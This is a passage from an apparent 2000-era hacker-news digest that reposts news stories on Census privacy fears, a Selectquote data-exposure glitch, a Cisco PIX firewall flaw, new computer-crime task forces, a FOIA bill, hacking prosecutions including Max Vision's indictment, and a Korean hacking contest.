form of the US Census has sparked privacy concerns ever since it was introduced in 1960. With the increased awareness of computer security and identity theft those fears are even greater. Some residents fear giving out their personal information on the off chance that it may be stolen or otherwise fall into the wrong hands. The Census Bureau has taken some solace in the fact that it has never suffered a computer related break-in. Philidelphia Inquirer http://www.phillynews.com/inquirer/2000/Mar/21/front_page/PCENSUS21.htm Census queries raising computer-security questions New inquiries strike some as an opening to hackers or invasions of privacy. Bureau officials say fears could reduce responses. By Thomas Ginsberg INQUIRER STAFF WRITER Betty McAdams is afraid computer hackers could steal her personal information. Joe Alessandroni figures marketers somehow will buy his. Entire Web sites question the government's right to the data at all. In the last two weeks, about 15 million Americans began receiving the most intrusive government questionnaire most will ever fill out. The "Long Form" from the U.S. Census Bureau - 37 pages filled with 53 questions about everything from language skills to toilets - is prompting some recipients to squeal about invasion of privacy, a complaint that has arisen every decade since the long form was launched in 1960. This year, however, Census officials and privacy experts said they detect a more pointed fear: concern about computer security. The growth of the Internet since the 1990 Census along with high-profile attacks on Web sites such as Yahoo have exacerbated already-rising concerns about the safety of any information on any computer anywhere. "Alarmed is a good word," said McAdams, 51, of Philadelphia, an assistant director of Greater Philadelphia First, an alliance of business executives in the region. "I assume they're going to compile all this information on a computer somewhere. . . . Probably if [computer hacking] had not happened so recently, I might not be as alarmed." To increasing numbers of people, the country is facing a "privacy Chernobyl," said Robert R. Belair, a Washington-based privacy lawyer and editor of a national newsletter on business privacy. "It doesn't surprise me that the Census Bureau is going to have more trouble this year than before." Unfortunately, some salient facts get lost in the din: The Census Bureau has never suffered a computer-related security breach, experts agree. Its computers are kept separate from other government systems, and respondents' names are separated from personal data when the results are eventually compiled into databases, Census officials say. Moreover, since the 1930s, the Census Bureau, backed by the U.S. Supreme Court, has jealously guarded its records; in 1942, it even rebuffed a demand from the U.S. War Department for information on potential draftees. Census officials, for their part, take the once-a-decade privacy complaints in stride as they collect the statistics for use in redrawing congressional districts and determining federal funding formulas. Questions about household income, for example, are used to estimate the number of subsidized lunches the neighborhood school might have to provide. This year's new question about whether a resident provides primary care for a grandchild is linked to welfare allocations. Maury Cagle, a bureau spokesman, said that even though the agency's confidentiality record is clean, "people have an ingrained suspicion about computers and private information. All of those things add to the falling response rate." The Census Bureau projects its response rate for the 2000 Census will hit its lowest level ever: 61 percent, down from 75 percent in 1980. As the response rate drops, the government has to hire ever more head-counters - "enumerators," in bureau jargon - to brave back streets and barking dogs to get the information personally. This year, the Census Bureau is mounting a $230 million outreach campaign designed to raise the response rate and keep down the expense of enumerators. Still, "people are a little more testy" about giving out personal information than in years past, said Gorden DeJong, director of Pennsylvania State University's Population Research Institute. DeJong and others blame everything: a spate of high-profile computer attacks; rising concerns about confidentiality; a constant if sometimes fluctuating distrust of government; and an ever-widening flood of private surveys and junk mail with which Americans already contend. "For the number of things I get in the mail, I already must be on 50 lists," said Alessandroni, 84, a retired lawyer from Philadelphia. "It's pretty obvious to me that there's no such thing as secrecy. . . . The information is bound to get around." In the last two weeks, either the long form or a separate three-page short form was mailed to 113 million households. An additional 22 million households with incomplete addresses or post office boxes were having their forms hand-delivered. Households that don't return the form by April 1 may get a visit from an enumerator. Every sixth household got a long form. The ratio was set by a scientific sampling formula, and people may not fill out a long form unless they were selected, said Phillip Lutz, assistant regional manager for the Census region comprising Pennsylvania, New Jersey, Maryland, Delaware, and Washington. Each form arrives bearing the bold-faced words: "Your Response is Required by Law." What is not written is the fact that the $100 fine for failing to respond - a fine dating to at least 1954 - apparently has not been imposed in decades, even though federal courts have upheld the constitutionality of the participation law. "We're not interested in fining people. We're interested in collecting information," Lutz said. Still, some people are willing, even eager, to pay the fine rather than give up personal information. "I wrote the number of people living in my house and enclosed a $100 check," said a 41-year-old participant in an Internet chat room about the Census, who spoke on condition that only his first name, Greg, be printed. "Why is it any of their business how I am paying or have paid for my home?" So far, the refusers appear to be in the minority. State and local officials across the country have joined with community and immigrant groups to push for full participation, arguing that the sacrifice pays off in federal funding. Pennsylvania officials have estimated that each person counted in Philadelphia is worth an average of $2,200 in federal funds. "The very people who are not participating need to be counted so they can have government services in their neighborhood," said Kate Kunda, 45, a Spanish teacher from Wayne, Delaware County. As for herself, Kunda added: "I was annoyed that they wanted to know about my electricity bill and mortgage, but we did make an effort to fill it out." @HWA 61.0 HNN:Mar 23rd:Insurance Co. Reveals Personal Info on Web ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse A software glitch allowed visitors to Selectquote.com to view the personal information of the previous visitor. At least 20 users had everything from name and address to current insurance coverage and parents health histories revealed. MSNBC http://www.msnbc.com/news/385464.asp?0m=T12R Insurance site exposes personal data Glitch on Selectquote site reveals information to next user By Mike Brunker MSNBC March 22 — Consumers who requested online life insurance quotes from Selectquote.com on Tuesday and Wednesday got more than they bargained for: Thanks to a software glitch, their personal information was left on the company’s Web site for the next user to see. THE PROBLEM occurred when a form that consumers fill out to request a quote failed to clear the contents at the end of the process. This left everything from the previous user’s name and address to information on current coverage and parents’ health histories plainly visible to the next person to request a quote. Lyle Griffin, a spokesman for Selectquote, said the problem occurred when programmers fixed a piece of code on the site that was causing a problem for users with an older version of Internet Explorer. Unfortunately, the fix created a problem in the quote request form, he said. The problem lasted from 4 p.m. PT on Tuesday until about 10 a.m. PT Wednesday, but it affected only about 20 users who were directed to a newly designed Selectquote site that is still being tested, Griffin said. .Not to minimize it,. he said of the problem. .Obviously this is extremely embarrassing.. MSNBC.com was alerted to the problem late Tuesday by a prospective Selectquote customer, who was outraged that other visitors to the site were able to view her personal information. .About 10 minutes (after filling out the form) I got a call from a woman in Ohio who said, ‘I’m just someone who’s on Selectquote and all your information is prepopulated in the questionnaire,’. said Ona Karasa of Bellevue, Wash. She said she went back on the site Wednesday morning and saw the information of two other people who apparently had just requested life-insurance quotes using the online service. MSNBC editors also were able to access personal information entered by other users until midmorning Wednesday. Another user, Richard Underwood of Rockville, Md., said he was alerted to the problem early Wednesday by e-mail from another Selectquote surfer. He said a company representative had called and left a message concerning his request for a quote, but did not mention the Web site problem. .Truthfully, I don’t know if I want to talk to anyone at Selectquote about life insurance at this point,. he said. Underwood said the experience would likely make him pause the next time he is prompted to enter personal information on a Web site. .I was just getting to the point where I was reasonably comfortable doing that, but I may have to think twice if this is how it works,. he said. @HWA 62.0 HNN:Mar 23rd:Cisco Admits to Big Hole in PIX Firewall ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse Last week Cisco admitted that it is possible to fool the PIX stateful inspection into opening up arbitrary TCP ports, which could allow attackers to circumvent defined security policies. The vulnerabilities effect any PIX firewall that has enabled FTP which is turned on by default. Vnunet http://www.vnunet.com/News/601083 Networking » John Leyden, Network News [22 Mar 2000] Cisco admits to serious PIX firewall flaw Cisco last week admitted that two security vulnerabilities affecting its PIX firewalls could leave corporate networks open to attack. In an interim security notice, the vendor acknowledged the existence of two related vulnerabilities that both cause its Secure PIX Firewalls to interpret FTP (File Transfer Protocol) commands out of context, leaving the networks behind the firewalls open to penetration. Cisco said that in certain configurations "it is possible to fool the PIX stateful inspection into opening up arbitrary TCP ports, which could allow attackers to circumvent defined security policies". All Cisco Secure PIX Firewalls with software versions up to and including 4.2(5), 4.4(4), and 5.0(3), that are configured to provide access to FTP services, are at risk from both vulnerabilities. Cisco admitted that the problem means any Cisco Secure PIX Firewall that has enabled the fix-up protocol FTP command could allow unauthorised data to reach the network it is designed to protect. Deri Jones, managing director of security tester NTA Monitor, described the issue as "serious", particularly because Cisco's offering is currently the third most popular firewall in the market. "To Cisco's credit it has issued a bulletin, but has not yet found any solutions. This will not be trivial to address and may take it some time," warned Jones. Clive McCafferty, managing director of security consultant CenturyCom, said that many users, which include BT, use Cisco's PIX firewalls for managed services. "This could allow an attacker to send spurious stuff and then launch an attack when a port is open," said McCafferty. The first vulnerability, which remains unfixed, is exercised when a client inside the firewall browses to an external server and selects a link that the firewall interprets as two or more FTP commands. The client begins an FTP connection as expected, and at the same time unexpectedly executes another command opening a separate connection through the firewall. The only solution Cisco currently suggests for this problem is disabling incoming FTP services. Any server that permits internal clients to make arbitrary outbound FTP connections may be vulnerable to this issue. The second, related problem is exercised when the firewall receives an error message from an internal FTP server containing an encapsulated command that the firewall interprets as a distinct command. This can be exploited to open a separate connection through the firewall. Both vulnerabilities are due to the command fix-up protocol FTP (portnum), which is enabled by default on the Cisco Secure PIX Firewall. To exploit the security flaws, attackers must be able to make connections to an FTP server protected by the PIX Firewall. » If you would like to comment on this article email us @ newseditor@vnunet.com @HWA 63.0 HNN:Mar 23rd:College To Offer Online Crime Fighting Courses ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lew A new state-of-the-art computer lab was unveiled by officials at the College of DuPage in Illinios on Monday at the college's Suburban Law Enforcement Academy. The lab will offer police officers (no civilians allowed) courses in reconstructing an electronic crime scene, as well as how to present such evidence in court. The lab, valued at $250,000, was donated by Microsoft Corp. and Omni Tech Corp. Chicago Tribune - Registration Required http://chicagotribune.com/news/metro/dupage/article/0,2669,SAV-0003210202,FF.html @HWA 64.0 HNN:Mar 23rd:Pittsburgh Gets Computer Crime Task Force ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse and Evil Wench A joint operation of federal and local authorities named the Pittsburgh High Tech Computer Crimes Task Force will try to help in the fight against cyber crime. The Task Force was announced on Tuesday at the Pittsburgh FBI offices. Pittsburgh Tribune http://www.triblive.com/digage/dfbi0323.html Pittsburgh Post Gazette http://www.post-gazette.com/regionstate/20000322cybercrime1.asp Tribune; FBI installs new task force aimed at fighting cybercrimes By Erik Siemers TRIBUNE-REVIEW The aqua Macintosh G3 computer, its electronic guts exposed, appeared harmless as it sat on a table in the Pittsburgh FBI offices Tuesday. But its hard drive tells investigators a different story - it was used to print counterfeit corporate checks. That Macintosh is one of the computers under examination by the Pittsburgh High Tech Computer Crimes Task Force. The medley of federal and local authorities trained to investigate computer-related crimes was unveiled yesterday The task force, one of the first in the nation, pools experts from local agencies such as Pittsburgh police with federal agencies such as the Secret Service and the Internal Revenue Service into one room to combat the rapid growth of cybercrimes. "Crimes we couldn't have conceived years ago are now routine," said U.S. Attorney Harry S. Litman, whose office is involved in the task force. "It is critical that we respond to these crimes by marshaling our resources." Western Pennsylvania is open to crimes such as hacker attacks and "a whole array of Internet fraud," partly because it has more software development firms than Silicon Valley, Litman said. "Our position poses significant vulnerability to cybercrimes," Litman said. The task force will be free to use each agency's resources along with those at Carnegie Mellon's Computer Emergency Response Team, said Richard D. Pethia, manager of CERT's networked systems survivability program. CERT will provide technical assistance to the task force, Pethia said. Each agency offers one representative to the task force who has been trained in forensic examinations of computers, said Dan Larkin, supervisor in charge of the FBI's White Collar and Computer Crimes Division. Aside from providing intelligence and technical assistance to computer investigations, the task force will focus on investigations where the Internet was used as the main tool in committing the crime. Michael Vatis, director of the FBI's National Infrastructure Protection Center in Washington, D.C., said all FBI field offices will eventually house task forces similar to Pittsburgh's. Pittsburgh is one of the initial task force sites partly because "we have a wealth of talent," said John P. Joyce, assistant special agent in charge of the FBI's Pittsburgh office. The city also has a good track record for law enforcement agencies working with each other and with Carnegie Mellon's technology resources, said FBI Special Agent Bill Crowley. Task force members will use traditional investigation skills along with advanced knowledge of technology to crack computer cases, said Vatis. "We need to have the technology to get the digital evidence," Vatis said. Getting that digital evidence can be as simple as copying the contents of the hard drive for analysis on its own computers, said Special Agent Tom Hyslip, the Secret Service's representative to the task force. "When we go to court we can say we never touched (the evidence)," Hyslip said. -=- Gazette; City at forefront of war on cybercrime FBI forming task forces to fight crimes of Internet age Wednesday, March 22, 2000 By Torsten Ove, Post-Gazette Staff Writer With its aging population and Rust Belt image, Pittsburgh may hardly seem like the kind of town the federal government would choose as a base for its war on sophisticated cybercrime. But yesterday, as local law enforcement officers stood stiffly for the cameras at FBI headquarters Downtown, authorities announced the creation of the nation's first task force specifically designed to combat computer intrusion, Web site vandalism, on-line espionage and other crimes of the rapidly evolving Internet age. "This is the future, but it is also very much the present," said Michael Vatis, the FBI's top cybercop. "This is putting Pittsburgh at the cutting edge of cybercrime prevention." The task force, comprised of federal, state and local agencies, is one of 16 planned nationwide in major cities. Pittsburgh was chosen because of the prevalence of software development companies here and the presence of Carnegie Mellon University's Computer Emergency Response Team, the nation's leading cybercrime research facility. In addition to focusing on complex computer and Internet crimes, FBI officials said the local task force will provide technical assistance to police departments in investigations of fraud, child pornography and identity theft that involve computers. Vatis, director of the National Infrastructure Protection Center in Washington, D.C., said computers are changing the face of crime so quickly that law enforcement agencies have to work together to keep up. In addition to working to combat large-scale attacks such as the one that disabled Yahoo!, eBay and other e-commerce Web sites last month, federal authorities have been scrambling to head off all manner of computer crimes, from organized hacking of government computers by suspected foreign agents to amateur vandalism such as that committed by the teen-ager who vandalized an anti-drug Web site with pictures of Beavis and Butthead. Locally, FBI Special Agent John P. Joyce said his agency is investigating 30 to 40 cases of computer intrusion and similar crimes, although he wouldn't reveal details of any of them. Because of their technical nature, each investigation requires much more expertise than the traditional capers tackled by FBI agents of old. The new breed of federal crime fighter is more likely to be an agent sitting at a computer all day than a suit-and-tie swashbuckler with a gun kicking down doors. "These cases are a lot more complicated than physical crime," said Vatis, "and they take a longer time to solve." Richard D. Pethia of CMU's CERT warned that the "denial of service" attacks that knocked the Internet companies off-line in February are only the beginning of new waves of cyberspace assaults. In 1998, he said, his center examined 4,000 incidents. Last year, the number reached 8,000. This year, it could double again. "This problem is real and it's here," he said. "The nasty thing about computer attacks is that they can be launched from anywhere on the planet." And it can be nearly impossible to track down the culprits and then prove they are responsible for specific on-line exploits. The attacks on the e-commerce companies, for example, remain unsolved, although Vatis said the FBI is making progress in the case. Not everyone is convinced the federal government, working with experts in the private sector, has what it takes to match wits with serious hackers bent on mayhem. "If I were a cyber criminal with the FBI after me, I would sleep like a baby," said Jay Valentine, president of InfoGlide Corp., an Internet security company, in a recent Scripps Howard report about Internet security. "Even a blind squirrel finds a nut, but the FBI will only catch amateurish hackers. The best ones are a generation ahead of the FBI." Other critics have blasted the FBI and the National Infrastructure Protection Center for reacting too slowly to the attacks on 30 university systems last year that laid the groundwork for the e-commerce shutdown last month. In a USA Today report, experts -- many of them cybersleuths selling their services -- also said the government's efforts were hindered by inter-agency squabbling and the fact that some companies don't trust the FBI enough to share information with agents. Vatis wouldn't address the USA Today report except to say that it was inaccurate. Regarding the charge of slow government reaction, he said the protection center issued a warning about the denial-of-service threat in plenty of time. The National Infrastructure Protection Center's Web site shows the warning went out on Dec. 30 and included detailed information about what defensive steps to take. Still, Vatis acknowledged that government agencies are "still in the process of getting up to speed." @HWA 65.0 HNN:Mar 23rd:Business May Be Protected Against FOIA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse To encourage companies to release information about online attacks a new bill would provide firms with an exemption to the Freedom of Information Act. Representatives Tom Davis, R-Va. and Jim Moran, D-Va. plan to introduce the bill later this week. It is hoped that this exemption will promote the reporting of cyber attacks by industry. (And at the same time erode citizens rights.) Newsbytes http://www.newsbytes.com/pubNews/00/146086.html Bill Would Protect Firms That Share Hacking Info By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 21 Mar 2000, 6:00 AM CST A new bill aimed at encouraging companies to share information about hacker attacks would provide firms with a limited exemption from the Freedom of Information Act (FOIA). Set to be introduced by Reps. Tom Davis, R-Va. and Jim Moran, D-Va., later this week, the legislation would allow companies to share information about cyberattacks with law enforcers and industry groups, without worrying that such information could come back to haunt them, Davis staffer David Marin said today. "The public interest will be served by companies coming forth to share their information" about attacks, Marin said. Too often now companies do not report cyberattacks for fear that such reports will find their way into the media, he said. While the bill would create a limited shelter under FOIA, it is not intended to allow companies to mask their business dealings, Marin said. When the legislation is completed it will be "narrowly tailored to address (information pertaining to) how the attack was done and what was done to fix the attack," Marin said. The legislation will apply only to telecommunications and information technology infrastructure attacks. Used primarily by the media, FOIA allows members of the press and the public to file legally binding requests for public documents. FOIA already contains an exemption for ongoing criminal investigations, by Davis and Moran are aiming to further protect firms that divulge information about cyberattacks, Marin said. Reported by Newsbytes.com, http://www.newsbytes.com . @HWA 66.0 HNN:Mar 23rd:Teenagers To Receive Deterrent Sentences ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse After selling stolen logon names and passwords three teenagers in Hong Kong were warned by Magistrate Ian Candy that they faced deterrent sentences. The three plead guilty to a total of 49 charges including the downloading and selling of music files. Sentencing has been scheduled for April 5th. South China Morning Post http://www.technologypost.com/features/Daily/20000322105804432.asp?Section FEATURES Teen hackers face deterrent sentences ELAINE PAK LI Three teenage computer hackers were warned yesterday that they faced deterrent sentences after they admitted selling login names and passwords stolen from the Internet in the first case of its kind in Hong Kong. One of the trio, a student, was also convicted of downloading songs from the Internet and selling them for profit. At Eastern Court, restaurant manager Tam Hei-lun and clerk Po Yiu-ming, both 19, and student Mak King-lam, 18, pleaded guilty to a total of 49 charges. Magistrate Ian Candy remanded them in custody for sentencing on April 5, pending reports, and said: "It is precisely these kind of computer crimes which leave Internet users in fear and make them pause before conducting even the most basic of transactions. "These criminal activities should be nipped in the bud and a deterrent sentence must be imposed." All the offences took place between March 1998 and May last year. David Leung, prosecuting, told the court Po had hacked into other Internet users' computers and unlawfully obtained 127 login names and passwords given to Internet users when they subscribe to an Internet service provider for a monthly fee and an hourly rate. The three defendants knew each other through the Internet and Po had sold some of his illegally obtained login names and passwords to Tam for $3,000, but gave others for free to Mak. Tam later resold them for $1,500. The three were aware that the information they obtained was acquired illegally, the magistrate was told. Mr Leung said the three defendants had hacked into the accounts of Internet users of Hongkong Telecom IMS Netvigator, Vision Network Ltd, City Telecom (HK), Netfront Information Technology and ABC Net, saving themselves the monthly fees and causing losses to the account holders. Tam admitted 14 counts of obtaining access to a computer with a view to dishonest gain, Po admitted 12 and Mak two. Mak also admitted 10 charges of selling pirated discs, in which he downloaded songs from the Internet and sold 200 discs from his own Web site. Each disc contained 100 songs and was priced at $88. Tam, who asked buyers of the logins to deposit money into his bank account, also admitted eight counts of dealing with property known or reasonably believed to represent proceeds of an indictable offence. Po admitted a further three charges of criminally damaging the computers of three users. @HWA 67.0 HNN:Mar 24th:2600 Retains Big name Attorneys - Trial Date Set ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Macki Martin Garbus, an internationally distinguished New York attorney, and his firm (Frankfurt, Garbus, Klein, and Selz) have been retained by the defense in the New York MPAA DeCSS case. Two of the three defendants have withdrawn under consent agreements, leaving only 2600 Magazine and its publisher Emmanuel Goldstein, as defendant. A trail date has been set for December 5, 2000. 2600 Electronic Frontier Foundation - They are providing funding, please show your support! http://www.2600.com/news/2000/0324.html http://www.eff.org TRIAL DATE SET IN DECSS CASE - WORLD RENOWNED LEGAL TEAM TAKES CASE 03/24/00 The importance of the fight against the MPAA and the DVD Copy Control Association was underlined this week with the hiring of the legal team of Frankfurt, Garbus, Klein, and Selz to represent 2600. Martin Garbus, who will be the key lawyer on our side, has defended the likes of Lenny Bruce, Spike Lee, Samuel Beckett, Andrei Sakharov, and Vaclav Havel and is the author of "Tough Talk," published in 1998. He is a renowned First Amendment attorney and, thanks to funding from the Electronic Frontier Foundation, we have him in our court. Please show your support to the EFF for taking on this important case and help them to play a key role in whatever cases come up in the future. We've already seen a significant development this week as we have been granted the time we need to build our defense. The court was prepared to start the trial on May 1st which is what the plaintiffs wanted. After presenting our arguments, we were given a court date of December 5th. This is a very good development for us as there is much to be prepared. An uninformed court would have been bad for all of us. As the weeks and months progress, we will be in need of expert witnesses and testimony supporting our position. Your help and support will be invaluable as always. We will keep you updated as events progress. @HWA 68.0 HNN:Mar 24th:Max Vision Indicted in San Jose ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by McIntyre A suspect involving computer break-ins at NASA and the U.S. departments of energy, defense and transportation was indicted in San Jose on Wednesday. the indictment of Max Vision (Max Ray Butler) of Berkeley included charges of unauthorized access of a computer, recklessly causing damage and interception of electronic communication for a total of 15 counts. Max Vision was previously an FBI informant who turned himself in on Tuesday. Associated Press - via Yahoo http://dailynews.yahoo.com/h/ap/20000323/us/hacker_indicted_1.html Wednesday March 22 11:56 PM ET Suspected Gov't Hacker Indicted SAN FRANCISCO (AP) - A suspected computer hacker made his first court appearance Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, said federal prosecutors. Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during the hearing in San Jose. On March 15, he was indicted on 15 criminal counts, including unauthorized access of a computer, recklessly causing damage and interception of electronic communication. All the counts carry sentences of at least six months and fines of hundreds of thousands of dollars. Butler, who also goes by the name of Max Vision, had been an FBI source, helping agents solve computer crimes, authorities said. He turned himself in on Tuesday. Butler's attorney did not return a telephone call seeking comment. -=- More: (SfGate) http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/03/24/MN57003.DTL FBI Computer Expert Accused of Hacking Henry K. Lee, Chronicle Staff Writer Friday, March 24, 2000 Max Ray Butler seemed to be at the top of his game. For two years, the computer expert was a confidential source for an elite FBI computer crime squad, helping to ferret out scofflaws on the Internet. Butler, also known as Max Vision, was also a self-described ``ethical hacker'' from the Silicon Valley who boasted that he could test the security of any computer system by penetrating it. But Butler's cyber activity went too far, federal authorities say. Butler, 27, of Berkeley appeared in federal court in San Jose yesterday on a 15-count federal indictment charging him with hacking into computers used by the University of California at Berkeley, national laboratories, federal departments, air force bases across the country and a NASA flight center. Butler posted $50,000 cash bail yesterday after U.S. Magistrate Judge Patricia Turnbull ordered him not to use computers except for work. Butler and his attorney, Jennifer Granick of San Francisco, could not be reached for comment. The indictment, handed down March 15, said Butler caused ``reckless damage'' as a result of intrusions in May 1998. Butler was also charged with possession, with intent to defraud, of 477 passwords belonging to customers of a Santa Clara- based Internet service provider. The case underscores the potential risks involved when law-enforcement agencies use confidential informants with access to sensitive information. ``Sources are often very close to criminal activity, and sometimes they cross the line,'' said Special Agent George Grotz, an FBI spokesman in San Francisco. Grotz declined to say how Butler became an FBI informant and whether he was a federal source at the time of the alleged crimes. Grotz said Butler is no longer associated with the agency. Friends of the suspect told the Associated Press that Butler was caught possibly violating the law several years ago and began working with the FBI to avoid charges. Seth Alves, 27, told the news agency that Butler was unfairly targeted after refusing to comply with an FBI request. A 22-month investigation by the FBI and military investigators ended Tuesday morning when federal agents converged on a home on Dwight Way near the UC Berkeley campus, where Butler lives with his his 23-year-old wife, Kimi Winters. No one answered the door. Butler turned himself in to the FBI in Oakland later that day. Butler grew up in Idaho and lived with his family in Washington, where authorities said he has a 1997 misdemeanor conviction for attempted trafficking of stolen property. He developed a proficiency with computers, eventually attracting the attention of the FBI's Computer Crime Squad, which used him as a confidential informant. An FBI search warrant affidavit said Butler was ``well known'' to squad members and ``has provided useful and timely information on computer crimes in the past.'' In 1997, Butler started a company known as Max Vision in Mountain View, specializing in ``penetration testing'' and ``ethical hacking'' procedures in which he would simulate for clients how a hacker would penetrate their computer systems, according to the company Web site. ``Our client penetration rate is currently 100 percent,'' the site said, with recent clients including a large consortium of telecommunications companies, a major motion picture company and an e-commerce online auction service. By 1998, Butler was living with Winters in a one-story San Jose apartment, where the couple started up their own Web-design company, Kimi Networks, records show. Reached by telephone yesterday, Winters hung up on a Chronicle reporter. It was also from that apartment, according to the FBI, that Butler hacked into computers by using a computer software vulnerability known as a buffer overflow, which sends commands into a system that ordinarily would not be allowed. Butler also allegedly invaded computers used by the Lawrence Berkeley National Laboratory. Vern Paxson, a computer scientist at the lab, noticed an online intruder conducting unauthorized scans of laboratory and UC Berkeley computers in May 1998 and used a monitoring device that later helped identify the source of the intrusions. Paxson said yesterday that Butler's arrest was ``somewhat ironic'' but ``not totally surprising.'' Paxson said a person later identified as Butler even sent him an apologetic e-mail a day after the computer intrusions. Butler also somehow obtained a confidential incident report Paxton had filed about the invasions, Paxson said. @HWA 68.1 KYZSPAM: More on Max Vision. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: Dragos (email) Further info from Dragos Ruii and the Kyxspam world domination conspiracy url: http://www.mediacentral.com/channels/allnews/03_23_2000.reutr-story-N23354790.html Ex-FBI source charged with hacking SAN JOSE, Calif., March 23 (Reuters) - A man officials say was once a confidential FBI source on computer hackers has been charged with allegedly breaking into computer systems belonging to NASA, the military and the U.S. departments of energy, defense and transportation, the U.S. Attorney's office said. Max Ray Butler, 27, also known as Max Vision, was due to appear in court on Thursday to face charges of breaking into and damaging computers as well as possessing the passwords of customers of California Internet service provider Aimnet. The indictment's 15 counts carry fines ranging from $5,000 up to $250,000 and jail terms totaling more than 50 years in prison, said officials at the U.S. Attorney's office in San Francisco. A Federal Bureau of Investigation affidavit filed to support a search of his home showed Butler, of Berkeley, Calif., was a confidential source for FBI agents tracking computer crimes before authorities began their 22-month investigation of him in May 1998. Butler, being held in lieu of $100,000 bond, surrendered on Tuesday to authorities in Oakland. He was scheduled to attend a bail review hearing on Thursday in U.S. District Court in San Jose. The arrest comes amid growing concern over a number of recent high-profile computer hacker attacks. But authorities said there is no connection between Butler and the "denial-of-service" attacks in early February that temporarily cut off customers to some of the Web's biggest sites, including Yahoo!, eBay , Amazon.com and E-Trade. "There are no allegations related to denial-of-service attacks but we would characterize this as a serious case," said U.S. attorney Ross Nadler, chief of the office's newly created Computer Hacking and Intellectual Property unit. Lawyers for Butler could not be reached for comment. The FBI, the U.S. Air Force, NASA and the U.S. Navy began an investigation after several U.S. Air Force computer systems around the country were attacked in May 1998, although it was unclear when Butler became their focus. Butler is accused of hacking into computers belonging to the U.S. Department of Energy's Argonne National Laboratories in Illinois and the Brookhaven National Laboratory in New York; NASA's Marshall Flight Center in Alabama; the office of the Secretary of Transportation in Washington, D.C.; the office of the Secretary of the Department of Defense in Washington, D.C.; and unspecified facilities of the Department of Defense, and IDSoftware of Mesquite, Texas. © 2000 Reuters Limited. All rights reserved. -=- From: Dragos Ruiu To: <*> Sent: Thursday, March 23, 2000 2:51 PM (Hmmm.... thanks Ken for the head's up. I am also in agreement: I don't know any of the details of the incident, but I do know that Max has been a valuable resource and has contributed enormous amounts of effort and knowledge to the entire computer security field. I hope that alone is of some mitigating consideration... --dr) Berkeley man indicted, charged with hacking government computers Copyright © 2000 Nando Media Copyright © 2000 Associated Press From Time to Time: Nando's in-depth look at the 20th century SAN FRANCISCO (March 23, 2000 8:20 a.m. EST http://www.nandotimes.com) - A suspected computer hacker appeared in court for the first time Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, federal prosecutors said. Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during the hearing in San Jose. On March 15, he was indicted on 15 criminal counts, including unauthorized access of a computer, recklessly causing damage and interception of electronic communication. All the counts carry sentences of at least six months and fines of hundreds of thousands of dollars. Butler, who also goes by the name of Max Vision, had been an FBI source, helping agents solve computer crimes, authorities said. He turned himself in Tuesday. Butler's attorney did not return a telephone call seeking comment. -- dursec.com / kyx.net - we're from the future http://www.dursec.com learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org, RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com -=- From: Dragos (I guess one of the interviews on radio ran this morning. This showed up on a local (MyBC) news page too, funny... I don't remember giving that quote to them. But out of all the negative light they could have shone I'm happy with the way it was handled. --dr) url: http://www2.mybc.com/bc/news/fs.cfm?id=172752 Friday , Mar 24, 2000 Guest speaker busted VANCOUVER (CKNW/AM980) -- An expert on Internet security who was scheduled to speak at a Vancouver conference has been arrested by the FBI. Max Butler is charged with hacking into computers and destroying information. One of the organizers of the local conference, Dragos Ruiu of Dursec-dot-com, says that Butler was very well known among those in the information technology sector. "He ran an intrusion database, kind of like a big listing of signatures that people use towatch for hackers intruding into their network, and it was quite a famous data base," said Ruiu. "Lots of Fortune 500 companies and big sites use his database as a way of protecting their networks." Ruiu is now scrambling to find a replacement for Butler. The conference runs May 10-12. -=- @HWA 69.0 HNN:Mar 24th:Koreans Attempt to Learn Security Secrets ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Apocalyse Dow The Korean Advanced Institute of Science and Technology (KAIST) will conduct a 'hacking contest'. the contest is set to start in June and will offer 100 Million Won in prize money for defeating a firewall. (If they really expect to get anything out this other than publicity they are sadly mistaken.) Chosun http://www.chosun.com/w21data/html/news/200003/200003220527.html KAIST to Hold Hackers Contest An international hacking contest will be held under the auspices of the Korean Advanced Institute of Science and Technology (KAIST) it was announced Wednesday. The Information Protection Education Research Center of the institute which formally opened the same day said that it will inject W300 million to host the First World Information Protection Contest (WIPC) in June. The contest will have hackers attempt to break into a firewall the center has built. A total of W100 million prize money is prepared for the event, which aims to find out the international standard of hackers and to test the capacity of Korean information protection technology. (Sim Jae-yool, jysim@chosun.com) @HWA 70.0 HNN:Mar 24th:Rack Mount Your iMac ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Found on Slashdot This has been posted elsewhere it is just to 